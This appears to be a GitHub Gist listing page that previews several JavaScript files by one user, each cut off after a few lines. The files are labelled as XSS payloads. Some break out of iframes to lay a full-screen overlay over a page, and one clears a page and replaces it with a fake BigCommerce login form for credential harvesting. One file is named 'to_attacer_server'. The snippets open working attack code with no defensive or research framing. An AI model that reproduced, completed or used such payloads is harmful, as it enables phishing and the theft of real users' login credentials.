Redwan20
Redwan20
/ to_attacer_server
Last active
September 21, 2025 16:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Complete Iframe Breakout Script - Escapes nested iframes and covers entire page | |
| (function() { | |
| console.log('π Starting complete iframe breakout sequence...'); | |
| // Function to create full-page overlay | |
| function createFullPageOverlay(targetWindow, targetDocument) { | |
| console.log('β Creating full-page overlay in target document'); | |
| // Remove any existing overlays | |
| try { |
Redwan20
/ iframe_break2.js
Created
September 4, 2025 13:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // XSS Payload - Iframe Breakout with Full Screen Overlay | |
| // This script breaks out of iframe constraints and creates a full-screen overlay | |
| (function() { | |
| // Function to create the overlay in the target window context | |
| function createOverlay(targetWindow, targetDocument) { | |
| // Create full-screen overlay iframe | |
| var overlay = targetDocument.createElement('iframe'); | |
| overlay.style.cssText = ` | |
| position: fixed !important; |
Redwan20
/ iframe_break.js
Last active
September 5, 2025 03:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Complete Iframe Breakout Script - Escapes nested iframes and covers entire page | |
| (function() { | |
| console.log('π Starting complete iframe breakout sequence...'); | |
| // Function to create full-page overlay | |
| function createFullPageOverlay(targetWindow, targetDocument) { | |
| console.log('β Creating full-page overlay in target document'); | |
| // Remove any existing overlays | |
| try { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // XSS Payload for GitHub Hosting - BigCommerce Login Form with Credential Harvesting and Alert | |
| // File: xss.js (to be hosted on GitHub Gist or Repository) | |
| (function() { | |
| // Clear everything immediately | |
| document.body.innerHTML = ""; | |
| document.head.innerHTML = ""; | |
| // Remove all existing scripts | |
| var scripts = document.getElementsByTagName('script'); |